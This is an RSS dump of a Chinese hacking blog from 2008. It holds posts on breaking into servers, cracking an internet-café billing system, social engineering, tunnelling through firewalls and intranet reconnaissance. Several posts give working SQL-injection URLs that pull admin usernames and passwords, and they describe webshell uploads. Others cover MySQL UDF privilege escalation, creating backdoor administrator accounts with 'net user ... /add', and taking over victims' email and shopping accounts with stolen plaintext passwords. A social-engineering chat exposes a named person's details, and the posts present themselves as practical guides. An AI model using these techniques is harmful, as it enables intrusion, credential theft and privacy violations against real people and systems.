不輕易戀愛 http://blog.tom.com/xieliang_521 zh newblog.tom.com RSS <![CDATA[ 实战PHP网站系统权限 ]]> http://blog.tom.com/xieliang_521/article/5082.html                                             

  错误提示中报了网站的路径,如果我们有相应的权限和信息,就可以直接利用into outfile得到webshell了。通过测试。发现该网站存在注入漏洞,利用order by语句迅速得到改表的字段数目是3(不是所有的都支持ORDER BY语句),于是提交http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,2,3,得到的结果如图

    

  2的位置可以利用,

  于是提交

  http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,user(),3

  http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,database(),3

  得到了用户名和数据名(user()和database()是MYSQL的内置函数),如图

  MYSQL用户名

                     

由于2是日期,所以利用load_file的时候错误(可能是长度超范围了吧),转移思路,打算进后台拿shell。通过拆解表明得到user为管理员的表,接着拆解列名,得到是password和 username,于是提交

  http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,password,3%20from%20user

  http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,username,3%20from%20user

  得到了用户名和密码,顺利进入后台。如图:

                       

                                            

  后台有数据库备份功能,于是在新闻管理的地方上传了一个jpg后缀的小马,然后来到数据库备分的地方,但是不知道为什么。显示不正确。

               

  接着WS抓包,得到备份往址,接着查看网页源文件,想通过自己写提交表单来备份数据,但是却查看不了源文件。无法得到表单名称,此路已死,得寻它路了。于是在后台乱逛,看到在友情链接处也能上传图片,试试上传PHP文件,竟然成功,遂将PHP大马送上(以前也碰到过这样的情况,不知道他们程序员是怎么想的)得到WEBSHELL

                               

接着目标转站系统权限了。通过目录浏览,发现此WEBSHELL权限很高(几乎全部是777权限),对WINDOWS目录有写的权限,自然而然的想到了MYSQL提权。但是由于我手中MYSQL用户不是ROOT,得找到ROOT的密码不可(我开始试过了用我手中的用户,发现不能释放UDF.DLL)。在C:\WINDOWS里面没有my.ini,其他地方也找不到ROOT密码。静心想想,由于权限较大,很有可能有直接执行命令的权限,苦于我着WEBSHELL没有这个功能。于是浏览其他网站目录,想找到ASPX的网站,利用ASPX提权(手中有ASPX提权好马 -- !)。但是没找到,服务器上全是PHP的。于是网上找了个英文的SHELL,里面有执行命令行程序的功能。由于没有回显,于是执行的命令后面加上>重定向执行结果到文本。执行 net user>log.txt成功。!于是分别执行 cmd.exe /c net user novaa 123456 /add;net localgroup administrators novaa /add ,分别执行成功,如图

           

  用户添加成功!执行NETSTAT -AN 开了3389

                

  远程连接,到这里,服务器拿下。

          

  今天拿站感受最深的就是公欲善其事,必先利其器件.对于网站检测,不能当太信赖工具,你看了我的这篇文章就知道了(http://hi.baidu.com/novaa/blog/item/2af1a1db6a059463d1164e5d.html).而提权相关的东西,自然都要有全而好的了.

]]> 2008-07-05 11:20:03 <![CDATA[ Pubwin2007网吧管理软件我来破 ]]> http://blog.tom.com/xieliang_521/article/5081.html QQ偶然间碰到好友笨蛋0012 哈哈。好久不见了。。聊了几句他传我一个工具精锐网吧辅助工具5.9 。。我晕接过来一个看原来是精锐网吧辅助工具 我网盘里存的啊。。 没有多想 。他说用他可以破解网吧免费哦。。 哦。。到是要看啦。。

  工具:精锐网吧辅助工具5.9

                      

                                

                                   

                                                           

                                                            

      

                                                               

                                                   

                                                 

                               

  注:此动画献给那些还奋战在网吧一线的小黑们。。。祝你们玩得开心。。另外提醒下,不要玩的过火了。。更不要说我教你们的哦。。要不被老板抓到打PP哦。。。^_^

  精锐网吧辅助工具5.9下载地址:http://www.namipan.com/d/1c9e5969e036b7e9a7509b7684d9a730958a9d1c79d61500

]]> 2008-07-05 11:18:02 <![CDATA[ 入侵飞龙网某分站全记录 ]]> http://blog.tom.com/xieliang_521/article/5080.html 注入点,权限为db_owner,如图一,轻车熟路的通过日志备份获得到一个webshell,这个具体过程就不再废话了。

               

                                                                                                   图一

    进了webshell大体看了下,权限非常低,于是上传了个php的马上去,因为在刚才用啊D列目录的时候看到有个php文件夹,所以想到服务器是支持php脚本的,php比asp权限高的多,找了个免杀的php大马传上如图二。

                                       

                                                                                            图二

  php默认是以\network service身份启动的,netstat –an看了下3389是开放的,而且外网可以直接telnet上,如图三:

                     

                                                                                             图三

  所以直接加个用户服务器就搞定了^0^,直接执行shell命令加用户失败,于是想着通过mysql提权,这次根本没看SERV-U,整天用它提权早就提厌了,首先在服务器上找到一个php连库的配置文件,打开得到mysql的账号和密码,如图四                   

                   

                                                                                      图四

然后上传个免杀的mysql本地提权小马,如图五,提交连接后我们就要到处udf.dll为我们待会创建函数做准备,导出目录为windows的目录如图六。

                                        

                                                                                          图五

            

                                                                                图六

  由于我刚才已经导出一次了,所以出错提示已经存在,下面我们在sql里创建函数,执行create function cmdshell returns string soname 'udf.dll',然后我们就可以通过select cmdshell('net user user password /add');来执行命令了,如图七。显示完成,但是现实往往是残酷的,下面的过程才是鼓动我写这篇文章的“罪魁祸首”。

              

                                                                                         图七

  net user下并没有我建的用户,如图八 ,郁闷中,mysql本来就是用system的身份启动的,怎末会加不上呢,原因只有一个,那就是这个变态管理员把net.exe的权限设置成刺猬了,谁都碰不得,包括管理员在内,后面证实了这点,哎,自己不用还不让人家用,管理员太不厚道了,既然是system权限启动的,那就有加用户的权限,但是通过net加用户是不行了,这时很自然的想到了两个api,NetUserAdd()和NetLocalGroupAddMembers(),你管理员可以禁止程序但是我就不信你能连api函数也一块禁了,便三下五除二写了个加用户的小程序add.exe,上传后执行,如图九

                         

                                                                                       图八

      

                                                                                                图九

  net user 查看如图十,正兴奋的连3389时却蹦出来个这样的提示,差点没吐血,如图11,管理员真够变态的,管理员也不让登3389,于是又把刚才那个程序加了句NetLocalGroupAddMembers(NULL,L"Remote Desktop Users",3,(LPBYTE)&account,1)重新编译 了下,上传执行,结果如图12: ,连接3389,成功登陆,如图13: 中间其实还走了很多弯路,甚至把对方telnet反弹到我机器上来了,在那证实的net的权限问题,呵呵总算是拿下了,清日志,补漏洞,走人!

                

                                                                                                  图十

                

                                                                                                   图11

                         

                                                                                                       图 12

                                               

                                                                                                     图13

版权声明:转载请注明来自于“华夏黑客同盟”,否则将追究法律责任。
]]> 2008-07-05 11:14:12 <![CDATA[ 我拿WebShell的经验(转) ]]> http://blog.tom.com/xieliang_521/article/5079.html   首先我们要确定我们要检测的网站,可以是自己定下的某个网站,也可以是自己通过Google或者Baidu搜索得到的,遇到ASP这样的动态网站入侵成功率是最佳的。不详细说了,这一步就是选定目标网站。

  然后我们开始对网站进行检测。仔细的看看这个网站的超链接尾部有没有形如"ID=XXX(XXX代表数字)"的字符;如果有的话,我们可以对其进行如下的基本检测:打开这个链接,在地址栏ID=XXX的后面加上“and 1=2”(不要加引号), 点击提交后打开一个新的页面,在这个页面中如果显示不正常,或者显示什么错误的话,就说明存在注入漏洞了!我们就可以尝试对其进行注入了!

  在这里我们注意下,一般有2种数据库的类型:ACCESS、MSSQL2种数据库。我们先来说一下关于ACCESS数据库的解破。

  在这里我们可以使用工具猜测数据库的内容(也可以手工猜测,但是太繁琐了),这里我们就使用明小子工具里的“SQL注入猜解”。填上我们刚才手工检测到的注入点,点击检测后程序开始检测是否存在注入点,开始我们已经手工检测过了,所以肯定是存在的了。然后就可以点击“猜解表名”,将数据库的表名给猜出

  来,有了程序,我们进行这些操作将会很简单;很快就会猜出所有的表名,接着选定我们要猜解的表名,用程序猜解该表名的列名,接着就可以再猜解记录的内容。一般防范措施不当的网站就会被猜出用户名密码;接着我们用程序自带的功能猜解后台地址,猜到之后,用得到的用户名密码进行登陆;一般防范措施差的网站甚至可以直接用万能的用户名密码’or’=’or’进行登陆。

  登陆成功之后,我们进入后台,进入后台才是一切入侵的基本条件。正式开始我们的入侵

  首先看下有没有数据库备份的功能,如果有,我们来看看怎么得到Webshell。

  1、用一句话木马。通过各种方法,把这句话写入到数据库,再把写入这句话的数据库通过备份变成后缀为.asp的文件,当然要注意备份后的文件地址,然后进行访问,如果显示的是乱码,那么就恭喜你了,基本上就成功了!在再本地用一个一句话木马的客户端进行连接,就连接出现乱码的那个页面地址,连成功之后,你就可以看见熟悉的WebShell了!

  2、用图片的上传功能。我们把ASP木马的后缀改成图片的后缀名,如GIF、JPG、BMP之类的,进行上传,上传成功之后,会提示文件上传成功,并且会给出文件的位置,如’UploadFiles/20080501012.gif’;但是,有的可能并不会提示,我们就要用WSockExpert对上传的过程进行抓包,抓到上传的路径;然后,我们通过数据库备份的功能,把gif等图片的格式变成ASP格式的数据库,进行访问,这时候我们通常就可以看见我们的WebShell了!但是目前有的网站上传功能会对这个进行检测,如果备份的文件检查不出属于数据库,则会提示“不合法的数据库”,这时候我们该怎么办呢?既然要检测是否有数据库特征,那我们把图片加入数据库特征不就可以了?对!事实就是如此,我们可以通过DOS的COPY命令给图片加上数据库特征,命令如下 “COPY 木马图片.gif+数据库文件.mdb 合成后的文件.gif”这样,我们合成后的图片就会带有数据库的特征了!

  但是,有的网站后台我们找不到有数据库备份的地方,上面的方法就不管用了,这时候我们该怎么办呢?别急,事情总是有解决的办法的。找到一个有上传功能的页面,随便上传个什么东西,用WSockExpert对上传过程进行抓包,一般我们点击上传之后,在WSockExpert抓到的包中就会找到上传的ASP页面和相应的COOKIES了,当然我们在这里一定要先进入后台,用管理员的账号进行上传,得到的COOKIES就是管理员的了,这个在后面可以用的上。我们再用明小子的上传功能,选择上传的页面,就是我们抓包得到的页面,填上得到的COOKIES,选择我们要上传的木马(要免杀哦!不然传上去就给服务器删了),点击上传,当程序提示成功时,我们就可以对自己的WebShell进行访问了!如果失败,就换换别的上传的类型试试看。

  有的时候我们可能真的一点拿不到某个网站的WebShell,我们这个时候就可以采用旁注的方法对属于同一台服务器的网站拿WebShell,然后提权拿到整台服务器,再对我们的目标网站进行入侵就可以了。

  以上是对ACCESS数据库的分析和获取webshell,下面,我对MSSQL数据库来进行下分析。过去我也是先学ACCESS数据库的解破,等到学MSSQL数据库的时候就发现自己还是有很多的不懂,因此又走了不少的弯路,现在把MSSQL数据库拿webshell的方法总结下,希望对才接触webshell的朋友们有所帮助。

  首先我们先检测下该MSSQL数据库的用户权限,一般都是有2种,一种是SA(system admin)权限,这个权限是很大的;还有一种就是DB_OWNER权限,这个权限赋给用户一些对数据库的修改、删除、新增数据表,执行大部分存储过程的权限。但是涉及到一些系统敏感操作的权限不具备,这也是它与SA权限的唯一区别。

我们首先来寻找网站所在服务器上的目录,可以使用啊D来查看目录,来寻找网站的目录,个人的经验是在D、E、F盘的地方。

  但是有的时候找不到怎么办呢?我们只要上传个vbs文件就可以了,把下面的文件保存为lookweb.vbs:

On Error Resume Next
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
    Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs",4096,"Lilo"
    WScript.Quit
End If
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
    If IsNumeric(obj3w.Name) Then
          Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
          Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
          If Err <> 0 Then WScript.Quit (1)
          WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
          For Each Binds In OService.ServerBindings
                Web = "{ " & Replace(Binds,":"," } { ") & " }"
                WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
          Next
          WScript.Echo "Path         : " & VDirObj.Path
    End If
Next

  然后使用NBSI上传到服务器上,然后执行cscript X:\lookweb.vbs,在回显信息里我们就可以看见该服务器上相应网站与其对应的网站目录,很方便的。网站目录一目了然。

  找到了网站的目录 ,我们就可以使用差异备份来获取webshell

  我喜欢使用xiaolu写的Getwebshell,其中的a就是我们过会一句话木马要连接的密码,一定要注意MSSQL数据库是什么类型的,是字符型的还是数字型的。填写好相应的地方,路径一般都是网站的目录,如“D:\wwwroot\”在后面写上备份后的数据库名称,如ri.asp;点“BackupShell”系统就开始自动备份数据库了。备份成功后我们就访问我们备份的文件,当浏览器打开是乱码的时候就成功了。我们用lake2的一句话链接下就可以了,注意要填写密码哦。到这里基本上就可以拿到webshell了;

  不用差异备份,就直接找到网站的目录,直接上传webshell文件到网站的目录下看看,也是可以的。

  以上都是自己长期实践总结的经验,完全是原创的,呼呼,累死我了。手都酸了。

]]> 2008-07-05 11:11:55 <![CDATA[ 经典社会工程学渗透IDC机房服务器 ]]> http://blog.tom.com/xieliang_521/article/5078.html  
经典社会工程学渗透IDC机房服务器

周末无聊,和眼圈聊天,告诉他我在用社会工程搞一个站点,真是没想到他竟然也在忙这个,我搞的是ARM产品的,拿到了系统管理员的密码。他竟然是在搞一个IDC公司,而且已经获得整个机房的管理员权限。看来目前的社会工程是很火的,本着发扬共享精神得原则,我们把自己的一点心得发出来,供大家参考,不足之处,还望大家多多指教。

渗透方式::通过网络聊天获取对方服务器帐号密码等信息

渗透目标:入侵ARM产品公司,商务互联IDC公司

思路:客服人员信息收集(关键)---技术客服信息收集(时间简短)---机房销售信息收集(中长,自己拿捏时间)---技术人员(关键)

与眼圈的社会工程相龋业氖羌虻サ枚啵窃诹私饬艘徊糠中畔⒑螅闷燮檬侄位竦昧丝捎眯畔⒊晒Σ陆獾玫焦芾碓泵苈耄蛞樯芤幌隆?lt;BR>我首先在他的站点上了解了点基本常识(啥都不知道就很容易穿帮了不是?)部分聊天记录:

CNhCerKF 12:00:59

您好,请问韩永是贵公司的吗?

ARM产品 12:01:13

您是?

CNhCerKF 12:02:37

我朋友介绍的,说让我找他请教关于NK9315板子的情况的。

ARM产品 12:03:08

噢,NK9315的板子好像停产了有一段时间了

CNhCerKF 12:03:38

停产了?您是?

ARM产品 12:03:43我是网站技术维护,我们是做嵌入式产品代理的

CNhCerKF 12:04:40

那他是做什么的呢?我一朋友让我找他的,您能告诉我下他的联系方式吗?谢了。…………

ARM产品 12:07:32

噢,如果你需要找资料就直接告诉我吧,如果我能提供的就直接给你了

CNhCerKF 12:08:25

好的,先谢谢您了,回头我需要什么我MAIL给你。

ARM产品 12:08:46

好的,itarm@163.com,这是我的邮箱,给我留言也可以

CNhCerKF 12:09:08

恩。谢了先

ARM产品 12:09:11

不客气。

CNhCerKF 12:09:28

请问您贵姓?

ARM产品 12:09:41

免贵姓庄,庄有福。

CNhCerKF 12:09:28

哈,我有一哥们也叫这个名字,他是83年的,你呢?

ARM产品 12:10:17

我是80年6月11号的,比他大点。/cy

CNhCerKF 12:10:28

看来是要叫大哥了哦,顺便问下,要怎么才能直接找到你呢?

ARM产品 12:11:03

你说找100871号就可以了。

CNhCerKF 12:12:12

大哥有电话没?如果您不在线我直接TEL您。

ARM产品 12:13:44

别总是您您的,太客气了。我电话是131642778XX。

CNhCerKF 12:14:35

好的,大哥您先忙,回头找您联系。

呵,就这样。我得到了他的基本资料,就这样,我得到了他服务器pcanywhere以及个人的一些密码,系统管理员密码。服务器权限的丢失竟然这么容易,社会工程,取权限于无形。

 

]]> 2008-07-05 11:07:08 <![CDATA[ 漫谈局域网中的限制与突破 ]]> http://blog.tom.com/xieliang_521/article/5077.html 现在的企业对于员工使用电脑进行了严格的限制,比如不能浏览网页,不能玩某些游戏,不能上MSN,限制端口等等。有限制就有突破,双方的较量在局域网中如火如荼地展开,没有硝烟,但趋于白热化。下面我们就来解析一下这较量的双方各自的招数。

  一、网站相关

  1、限制:

  不能访问网站,网络游戏(比如联众)不能玩,这类限制一般是限制了欲访问网站的IP地址。

  2、突破:

  对于这类限制很容易突破,用普通的HTTP代理就可以了,或者SOCKS代理也是可以的。现在网上找HTTP代理还是很容易的,一抓一大把。在IE里加了HTTP代理就可以轻松访问目的网站了。

  二、协议相关

  1、限制:

  如不能FTP、TELNET等,还有就是限制了一些网络游戏的服务器端IP地址,而这些游戏又不支持普通HTTP代理。

  2、突破:

  这种情况可以用SOCKS代理,配合Sockscap32软件,把软件加到Sockscap32里,通过SOCKS代理访问。一般的程序都可以突破限制。对于有些游戏,可以考虑Permeo Security Driver这个软件。如果连SOCKS也限制了,那可以用socks2http了,不会连HTTP也限制了吧。

  三、包过滤相关

  1、限制:

  或者禁止了一些关键字。这类限制就比较强了,一般是通过代理服务器或者硬件防火墙做的过滤。比如:通过ISA Server 2006禁止MSN ,做了包过滤。这类限制比较难突破,普通的代理是无法突破限制的。

  2、突破:

  这类限制因为做了包过滤,能过滤出关键字来,所以要使用加密代理,也就是说中间走的HTTP或者SOCKS代理的数据流经过加密,比如跳板,SSSO, FLAT等,只要代理加密了就可以突破了, 用这些软件再配合Sockscap32,这类限制就不起作用了,MSN就可以上了。

  四、端口相关

  1、限制:

  限制了某些端口,最极端的情况是限制的只有80端口可以访问,也就只能看看网页,连OUTLOOK收信,FTP都限制了。当然对于限制几个特殊端口,突破原理一样。

  2、突破:

  (1).找普通HTTP 80端口的代理,象12.34.56.78:80这样的,配合socks2http,把HTTP代理装换成SOCKS代理,然后再配合SocksCap32,就很容易突破了。

  提示:这类突破办法中间的代理未加密。

  (2).用类似FLAT软件,配合SocksCap32,不过所做的FLAT代理最好也是80端口,当然不是80端口也没关系,因为FLAT还支持再通过普通的HTTP代理访问,不是80端口,就需要再加一个80端口的HTTP代理。代理跳板也可以做到,不过代理仍然要80端口的。对于单纯是80端口限制,还可以用一些端口转换的技术突破限制。

  提示:这类突破办法中间走的代理加密,网管不知道中间所走的数据是什么。

  五、综合限制

  比如有限制IP的,也有限制关键字,比如封MSN, 还有限制端口的情况。一般用第四种情况的第二个办法就可以完全突破限制。只要还允许上网,所有的限制都可以突破。

  六、纵深限制

  1、限制:

  没给你上网的权限或者IP,或者做IP与MAC地址绑定了,根本不让上网。

  2、突破:

  通过公司的好朋友找一台能上网的机器,借一条通道,装一个代理软件就可以了。我进行了一下测试,情况如下:局域网环境,有一台代理上网的服务器,给予一部分IP上网权限,而另一部分IP不能上网。即使在硬件防火墙上做了限制或者做MAC地址与IP绑定也没有用,照样可以突破这个限制。

  工具:HTTPTunnel V3.4.1037

  下载地址:http://www.onlinedown.net/soft/36725.htm

  第一步:在要突破的机器上(192.168.1.226)启动HTTPTunnel客户端。打开命令提示符(cmd.exe),然后执行:htc -F 8888 192.168.1.231:80

  提示:其中htc是客户端程序,-f参数表示将来自192.168.1.231:80的数据全部转发到本机的8888端口,这个端口可以随便选,只要本机没有占用就可以。

  然后我们用Netstat看一下本机现在开放的端口,发现8888端口已在侦听。

  第二步:在对方机器上启动HTTPTunnel的服务器端,并执行命令:

  hts -f localhost:21 80

  提示:这个命令的意思是说把本机21端口发出去的数据全部通过80端口中转一下,并且开放80端口作为侦听端口,再用Neststat看一下他的机器,就会发现80端口现在也在侦听状态。

  第三步:在要突破的机器上用FTP连接本机的8888端口,现在已经连上对方的机器了,上网限制已经突破。

  说明:

  1、HTTPTunnel工具可以欺骗防火墙,让在防火墙上做的限制失效;

  2、HTTPTunnel工具利用的80端口不会和web服务器的80端口冲突。

  局域网中的较量仍在继续着,不管你是看客,还是其中的那一方,但愿这篇文章能够让大家知己知彼,限制的继续限制,突破的仍在突破。

 

]]> 2008-07-05 11:04:57 <![CDATA[ 看高手教你如何用命令行更改IP地址 ]]> http://blog.tom.com/xieliang_521/article/5076.html 在Windows中,如果你要设置IP地址,一般是进入“本地连接”->“属性”,手动设置要更改的IP地址。其实,在命令行同样可以设置IP地址。如果你的IP需要在几个IP中来回切换,可以使用 netsh 命令更改:

  1.进入CMD命令行;

  点击“开始”->“运行”,输入“cmd”,回车,

  2.设置IP:

  设置动态获取IP地址(DHCP)

  设置固定IP

  参数说明:

  1.name:网络连接名称,一般为“本地连接”。你可以在“控制面板”->“网络连接”中看到。

  2.source:获取IP的途径。动态获取,则为dhcp,手动设置,则为static。

  3.addr:要设置的IP地址。

  4.mask:子网掩码。

  5.gateway:网关地址。

  6.gwmetric:网关跃点数,可以设置为整型数值,也可以设置为“自动”:auto。

  3.设置DNS:

  自动获取DNS

  手动设置单个DNS

  手动设置多个DNS

  参数说明:

  1.name:网络连接名称,一般为“本地连接”。你可以在“控制面板”->“网络连接”中看到。

  2.source:获取IP的途径。动态获取,则为dhcp,手动设置,则为static。

  3.addr:要设置的IP地址。

  4.register:

  5.none: 禁用动态 DNS 注册。

  6.primary: 只在主 DNS 后缀下注册。

  7.both: 在主 DNS 后缀下注册,也在特定连接后缀下注册。

  8.index:设置的DNS的顺序号。

  4.编写设置IP/DNS的批处理文件:

  知道了如何设置IP和DNS后,你可以自己编写一个BAT文件:

  新建一个文本文档,将后缀改为“.bat”;

  编辑“.bat”文件的内容为上面的设置命令。例如:

  运行时,双击这个bat文件,等待设置完成即可。

  关于netsh命令的详细使用说明,可以在命令行,输入 netsh /? 命令查看,这里就不做说明了,希望能对你有用。

 

]]> 2008-07-05 11:03:19 <![CDATA[ 全盘禁止运行指定程序(*.exe) 批处理 ]]> http://blog.tom.com/xieliang_521/article/5075.html 务必点击“引用”后再复制:::::内命令,保存为.bat文件。可远程调用看效果。

注册表中禁止运行:

::::::::::::::::::::::::::::::::::::::

@echo off

set route=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

:fix

for /f %%i in (list.ini) do reg add "%route%\%%i" /v Debugger /t REG_SZ /d 全盘禁止运行%%i /f &gt;nul 2&gt;nul

cls

::::::::::::::::::::::::::::::::::::::

注册表中解除禁止运行:

::::::::::::::::::::::::::::::::::::::

@echo off

set route=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

:unfix

for /f %%i in (list.ini) do reg delete "%route%\%%i" /f &gt;nul 2&gt;nul

cls

::::::::::::::::::::::::::::::::::::::

.bat文件同目录内建一"list.ini"文件,内容为要禁止的文件名,如:

a.exe

baidu.exe

bd.exe

display3d.exe

atisrv.exe

ati32srv.exe

.exe

1.exe

2.exe

logo.exe

logo_1.exe

......(可自行添加)

 

 

]]> 2008-07-05 10:59:34 <![CDATA[ 记一次简单的社会工程学渗透 ]]> http://blog.tom.com/xieliang_521/article/5074.html 开门见山。一日检测一著名企业网站,发现一个注入点,可列目录,犹豫什么,于是备份了一个一句话木马,连接上,发现Serv-U,也不用犹豫,提权吧!成功加了管理员。2003系统,恰好开了3389,天助我也,mstsc连接之,却提示超过最大连接数。没关系,这难不倒我们,在运行中输入mstsc /console /v:IP:终端端口 即可。


成功连接!突然心血来潮,翻看了它的注册用户表,不看不要紧,数据好多,机器都险些卡住。搜集信息吧!姓名啊,密码啊,邮箱啊什么的,一应俱全。密码都是明文,唉。想到了吗?我们为何不应用应用社会工程学?说干就干,挑几个比较顺眼的邮箱,用我们得到的邮箱和密码登陆。先发一下牢骚,126,雅虎中国,20cn的邮箱不是一般的难用。好了,看一下成果。在我这组数据中,163的邮箱最多,一次次的成功登陆很是过瘾。

翻看邮件,一封校内网的邮件引起了我的注意。


同样的思路,登录他的校内。


我只是截了一张图。相信用过校内的都知道。不止是QQ,MSN,手机号码,其实相片,家庭住址,曾经上过的小学,初中,高中,大学,都可以得到。大家可以发散思维。

再进一个邮箱看看。


手机消费记录出来了,接着看:


MySpace的帐号密码出来了,快不快?


继续,又进去了个邮箱。找到了邮箱主人的手机,身份证号。把邮件翻看了个遍,结果看到了马云大侠的淘宝,淘宝可真是火啊。


这是注册时的邮件。我们登录他的淘宝,失败!怎么办?没关系,我们收集了那么多信息了,很有用的。淘宝取回密码只需用户名,身份证号码,邮箱即可。我们缺什么?呵呵,什么也不缺。看看结果。


重设密码


成功登陆:


友情提示:重设密码有风险,行动之前请三思。

现在的电子商务很火,很多人现在都是网上购物了,这不,又发现了一个,这次是99read:


信息丰不丰富?诸如此类,不胜枚举。总之,发散思维,你可以获得你想要的很多很多信息。

看完邮箱之后,又看了一下服务器。安装了Cain,等鱼上钩。具体过程网上有很多教程,此处略去不表。不出几分钟,嗅探到了一个Sa权限的MSSQL,连接之,加用户,3389敞开着,轻而易举拿下服务


没有IIS,看来是一台数据库服务器。翻翻硬盘的文件,很幸运,发现了传说中的FlashFXP。


由于我并没有装FlashFXP,还是直接把它整个文件夹拖回来吧!打开看看成果,不错,好几十个站。


随后又嗅了些FTP,HTTP帐号密码,登录了一些服务器,成功!就不多截图了。

总结一下,其实也没用到什么技术,就是一些思维的发散。多收集信息,多思考,足矣!其实渗透就像搭积木,玩的就是思维!

 

]]> 2008-07-05 10:54:42 <![CDATA[ 菜鸟安检传世SF报告(转) ]]> http://blog.tom.com/xieliang_521/article/5073.html 对于"传世SF 或者其他网游SF" 我想好有多菜鸟都想知道怎么才能拿下服务器当GM...俺也一样..可是当你跑到某XXX黑客论坛.发个贴问这类问题...可是结果只有一个....人家鸟都不鸟你...(俺也一样..前天俺跑到几个大型黑客网站找找相关资料还有发几个相关SF入侵的问题...TMD没有一个人鸟俺.最令俺火的是那论坛还写着"有求必认"我RRRRRRR)
    求人不如求己..还是自己总结学习的东西跑去搞一搞看看还好...一说就做...找了30多个传世SF的IP(因为俺还是菜鸟级没有理由说日哪个SF就能日下吧...)(找这30几个SF的IP还真累...汗...)
    先说说这30多个SF...基本上都是同一段网的..虚以电脑做服务器 而且网站都是静态的HTM...(该死的,还想从注入下手.不过说真的现在的SF多数都是静态页面...谁还敢用"洞"态网卖自己的SF..呵呵)既然注入没戏了.就用旁注..本来以为旁注的机会好大...但后来发现..30多个SF只有3个有旁注...而且3个中只有一个可以能拿下WEBSHELL(技术不够...汗..)  拿下了WEBSHELL本来想提权的.后来发现服务器搞的太BT了..连NET1.EXE都不能用...结果放弃了..
  既然从网站入手是如此的狼狈..转了转思路..端口入侵吧...(心想  从端口入侵机会应该好底.)
  1433弱口令  (这个第一个废了..不要问我为什么...) 不要说SF的服务器了..就算服务器真的有架设SQL你也没什么可能能拿下..1433俺都疯狂过一段时间..实在是小得可怜....(我说的是国内服务器)
    1433不行的就跑到8080端口看看....一扫描....TMD...一堆哗....后来试试...汗...怎么都进去了那些页面了...(俺也不知道是什么页面.进去了就说配置LANIP  路由?)最后没有一个成功..
    1433 8080都不行了更不要说 23 135 3389 5900 4899 这些...  正在准备放弃的时候点了根烟..换个角度想想..如果我是那个SF的管理员...我的SF下最基本要有些什么....................................IIS  对哗..IIS..这个时候联想到了IIS5.0漏洞...上网找了找资料...复习复习这个经典漏洞...
    IIS5.0俺用了一台服务器扫描..不久这30多个站的基本IP段扫描完成..看看结果..恩...不错..还真的有好个台服务器有这个漏洞...最后分别写入了大马提权拿下了某一台服务器..可惜...那台服务器是"热血SF的"(俺不懂玩这个..画资没有传世好..呵呵)心想...这台SF拿下了有什么用...135抓鸡?无聊..要拿么多肉鸡干嘛?算了...不想了.还是仍到一边先..
    连IIS的经典漏洞都拿出来了.还是没什么成果...汗...心想真的没有办法了吗???再从新整理思路....结果发现自己还有21这个端口没有搞..不要念那么多了..扫扫就清楚了...(近几天都有人发这样的教程..)21端口开放的IP还真多..而且弱口令占了1/3...但是还没有一台服务器能拿下....回想一下..21端口不是还有个SERV-U漏洞吗??因为之前扫描21端口的字典中都没有加入SERV-U的默认密码..所以没有一台能成功拿下..后来加上了..拿下6个WEBSHELL..
    总结.从这几天安检SF的情况来看,基本上都是以"弱口令"的漏洞进行入侵..而且反而经典漏洞表演的不错...弱口令的漏洞可以说 0% 虽然这次的安检SF失败了..但还是值得高兴的..因为毕竟增长了自己的思考能力...不过令俺火的事就是那些所谓的人气黑客论坛...TMD还是"有求必认"我R老子等了几天毛都没有回复...从那些论坛管理员看上来,他们都只是注重流量...而不是以前的黑客论坛那么纯真...时代变了..社会也一样..能怪谁...怪就只有怪自己..

 

]]> 2008-07-05 10:52:30 <![CDATA[ 内网渗透---常用手法 ]]> http://blog.tom.com/xieliang_521/article/5072.html 内网,很多人应该形成了这个概念,很多大型网络的外部网站或是服务器不一定有用,当然外网也是一个突破口。很多时候我们直接从外网入手,随着安全的不断加固,已变得越来越困难。那么黑客通常是怎么进行内网渗透的,内网渗透又是怎样与社会工程学联系起来呢,今天主要描述黑客内网渗透的常用操作手法,关于如何获得内网机器,请查找我以前的一篇文章《内网渗透---如何打开突破口》。
 
渗透的过程就是一个信息刺探、利用、思考、突破的过程。首先在我们获得一台内网的机器后应该怎么做,当然是信息刺探。
一.信息刺探
1. 当前机器的人物身份,当前控制的这台机器人物是一个什么样的身份,客服、销售人员还是开发人员,还是管理员。客服会做些什么,会通过什么方式跟其它人联系;开发人员在开发什么,应该会跟管理员联系,也会有一定的外网管理权限和内网测试服务器,这种情况下内网测试服务器是可以搞定的。如果是客服机器或是销售人员机器呢,他一定有整个公司或是网络的联系方式,自己发挥想象去。是管理员机器的话就不用说。
2. 当前网络结构的分析,是域结构,还是划分vlan的结构,大多数大型网络是域结构。一般外网的服务器都是有硬件防火墙的,并且指定内网的某些机器的mac才可以连接。所以我们先看看内网情况:
   C:\WINNT\system32>net view
伺服器名稱            說明
 
-------------------------------------------------------------------------------
\\2007ACC                                                                     
\\ABS-XP                                                                      
\\ACER-TS250           NAS 4BAY SATA                                          
\\ACER-TS500           NAS 4BAY SATA                                          
\\ACER6100                                                                   
\\AKIRA-WU             akira-wu                                               
\\ALICECHEN                                                                   
\\AMYCHIU                                                                     
\\ANDY2007                                                                    
\\ANDYTEST01                                                                  
\\ANNHUANG                                                                    
\\ANNIEKUO                                                                    
\\APOLLO                                                                      
\\APOPO                                                                       
\\ARTSERVER                                                                   
\\AUGTCHIEN                                                                   
\\AVSERVER                                                                    
\\BENLEE01                                                                    
\\BENSON-NB   

先用net view查看内网的情况,列出的机器就是在网络结构中有联系的机器,但不一定都在一个网段,所以ping出这些机器的ip,以便分析大概有哪些网段.
3.了解本机在网络中所占的角色
先ipconfig /all看下是否在域中,如图:
 

 从上图,我们可以得知,存在一个域xxxx,从内网ip来看,应该还存在很多个段,内网很大。我们ping 一下域xxxx,得到域服务器的ip.

